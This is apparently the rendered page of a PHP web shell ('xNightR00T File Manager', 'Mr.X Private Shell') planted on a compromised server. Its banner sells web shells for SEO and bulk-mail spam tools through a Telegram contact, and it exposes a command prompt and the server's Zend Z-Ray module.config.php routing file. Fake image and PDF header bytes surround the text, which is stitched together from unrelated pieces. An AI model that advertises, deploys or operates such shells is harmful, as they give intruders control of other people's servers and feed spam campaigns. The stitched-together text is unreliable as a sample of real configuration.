xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php
use Zend\Router\Http\Segment;
use Zend\Router\Http\Literal;
return array(
    'controllers' => array(
        'aliases' => array('Z-Ray' => 'DevBar'),
        'invokables' => array(
            'DevBar' => 'DevBar\Controller\IndexController',
            'DevBarWebApi-1_8' => 'DevBar\Controller\WebAPIController',
            'DevBarWebApi-1_9' => 'DevBar\Controller\WebAPIController',
            'DevBarWebApi-1_10' => 'DevBar\Controller\WebAPIController',
            'DevBarWebApi-1_12' => 'DevBar\Controller\WebAPIController',
            'DevBarWebApi-1_13' => 'DevBar\Controller\WebAPIController',
            'ZrayLive' => 'DevBar\Controller\ZrayLiveController',
            'ZrayHistory' => 'DevBar\Controller\ZrayHistoryController',
            'ZRayId' => 'DevBar\Controller\ZRayIdController',
        ),
    ),
    'view_manager' => array(
        'template_path_stack' => array(
            __DIR__.'/../views',
        ),
    ),
    'service_manager' => array(
        'aliases' => array(
            'devbar_dictionary' => 'DevBar\Filter\Dictionary',
        )
    ),
    'router' => array(
        'routes' => array(
            'DevBar' => array(
                'type' => Segment::class,
                'options' => array(
                    'route' => '/Z-Ray[/:action]',
                    'constraints' => array(
                        'action' => '[a-zA-Z][a-zA-Z0-9_-]*',
                    ),
                    'defaults' => array(
                        'controller' => 'DevBar',
                        'action' => 'index',
                        'requireIdentity' => false,
                        'bootstrap' => true,
                    ),
                ),
            ),
            'ZRayId' => array(
                'type' => Segment::class,
                'options' => array(
                    'route' => '/Z-Ray-Id[/:pageId[/:token]]',
                    'defaults' => array(
                        'controller' => 'ZRayId',
                        'action' => 'index',
                        'requireIdentity' => false
                    ),
                ),
            ),
        ),
    ),
    'view_helpers' => array(
        'invokables' => array(
            'functionsStatsXml' => 'DevBar\View\Helper\FunctionsStatsXml',
            'functionsStatsJson' => 'DevBar\View\Helper\FunctionsStatsJson',
            'backtraceXml' => 'DevBar\View\Helper\BacktraceXml',
            'backtraceJson' => 'DevBar\View\Helper\BacktraceJson',
            'requestInfoJson' => 'DevBar\View\Helper\RequestInfoJson',
            'requestInfoXml' => 'DevBar\View\Helper\RequestInfoXml',
            'runtimeJson' => 'DevBar\View\Helper\RuntimeJson',
            'runtimeXml' => 'DevBar\View\Helper\RuntimeXml',
            'sqlQueriesJson' => 'DevBar\View\Helper\SqlQueriesJson',
            'sqlQueriesXml' => 'DevBar\View\Helper\SqlQueriesXml',
            'logEntriesJson' => 'DevBar\View\Helper\LogEntriesJson',
            'logEntriesXml' => 'DevBar\View\Helper\LogEntriesXml',
            'exceptionsJson' => 'DevBar\View\Helper\ExceptionsJson',
            'exceptionsXml' => 'DevBar\View\Helper\ExceptionsXml',
            'sqlQueriesStatus' => 'DevBar\View\Helper\SqlQueriesStatus',
            'superglobalStructureJson' => 'DevBar\View\Helper\SuperglobalStructureJson',
            'superglobalStructure19Json' => 'DevBar\View\Helper\SuperglobalStructure19Json',
            'superglobalStructureXml' => 'DevBar\View\Helper\SuperglobalStructureXml',
            'devBarPager' => 'DevBar\View\Helper\DevBarPager',
            'devBarSearch' => 'DevBar\View\Helper\DevBarSearch',
            'devBarExpandAll' => 'DevBar\View\Helper\DevBarExpandAll',
            'accessTokenJson' => 'DevBar\View\Helper\AccessTokenJson',
            'sqlQueryFormat' => 'DevBar\View\Helper\SqlQueryFormat',
            'zrayTable' => 'DevBar\View\Helper\ZrayTable',
            'zrayHeader' => 'DevBar\View\Helper\ZrayHeader',
            'zrayFooter' => 'DevBar\View\Helper\ZrayFooter',
            'zrayInject' => 'DevBar\View\Helper\ZrayInject',
            'notificationsJson' => 'DevBar\View\Helper\NotificationsJson',
        )
    ),
    'webapi_routes' => array(
        'zrayGetRequestsInfo' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayGetRequestsInfo',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'devBarGetRequestsInfo',
                    'versions' => array('1.8'),
                    'skipauth' => true,
                    'bootstrap' => true,
                    'devbar' => true
                ),
            ),
        ),
        'getZraysList' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/getZraysList',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'getZraysList',
                    'versions' => array('1.13')
                ),
            ),
        ),
        'zrayGetAllRequestsInfo' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayGetAllRequestsInfo',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'devBarGetAllRequestsInfo',
                    'versions' => array('1.9'),
                    'viewsmap' => array('1.9' => '1.8'),
                ),
            ),
        ),
        'zrayGetCustomData' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayGetCustomData',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'devBarGetCustomData',
                    'versions' => array('1.9'),
                    'bootstrap' => true
                ),
            ),
        ),
        'zrayCreateAccessToken' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayCreateAccessToken',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'zrayCreateAccessToken',
                    'versions' => array('1.8'),
                ),
            ),
        ),
        'zrayCreateSelectiveAccess' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayCreateSelectiveAccess',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'zrayCreateSelectiveAccess',
                    'versions' => array('1.10'),
                ),
            ),
        ),
        'zrayRemoveAccessToken' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayRemoveAccessToken',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'zrayRemoveAccessToken',
                    'versions' => array('1.8'),
                ),
            ),
        ),
        'zrayExpireAccessToken' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayExpireAccessToken',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'zrayExpireAccessToken',
                    'versions' => array('1.8'),
                ),
            ),
        ),
        'zrayDeleteByIds' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayDeleteByIds',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'zrayDeleteByIds',
                    'versions' => array('1.10'),
                ),
            ),
        ),
        'zrayDeleteByPredefinedFilter' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayDeleteByPredefinedFilter',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'zrayDeleteByPredefinedFilter',
                    'versions' => array('1.12'),
                ),
            ),
        ),
        'zrayListAccessTokens' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayListAccessTokens',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'devBarListAccessTokens',
                    'versions' => array('1.8'),
                ),
            ),
        ),
        'zrayGetRequestEnvironment' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayGetRequestEnvironment',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'devBarGetRequestEnvironment',
                    'versions' => array('1.8', '1.9'),
                    'skipauth' => true,
                    'bootstrap' => true,
                    'devbar' => true
                ),
            ),
        ),
        'zrayGetRequestFunctions' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayGetRequestFunctions',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'devBarGetRequestFunctions',
                    'versions' => array('1.8'),
                    'skipauth' => true,
                    'bootstrap' => true,
                    'devbar' => true
                ),
            ),
        ),
        'zrayGetBacktrace' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayGetBacktrace',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'devBarGetBacktrace',
                    'versions' => array('1.8'),
                    'skipauth' => true,
                    'bootstrap' => true,
                    'devbar' => true
                ),
            ),
        ),
        'zrayGetDebuggerConfigurations' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zrayGetDebuggerConfigurations',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'devBarGetDebuggerConfigurations',
                    'versions' => array('1.8'),
                    'skipauth' => true,
                    'bootstrap' => true,
                    'devbar' => true
                ),
            ),
        ),
        // used from Z-Ray standalone
        'zraySignIn' => array(
            'type' => Literal::class,
            'options' => array(
                'route' => '/Api/zraySignIn',
                'defaults' => array(
                    'controller' => 'DevBarWebApi',
                    'action' => 'devBarSignIn',
                    'versions' => array('1.8'),
                    'skipauth' => true,
                    'bootstrap' => true,
                    'devbar' => true
                ),
            ),
        ),
    ),
);

Filemanager

Name Type Size Permission Actions
module.config.php File 11.32 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1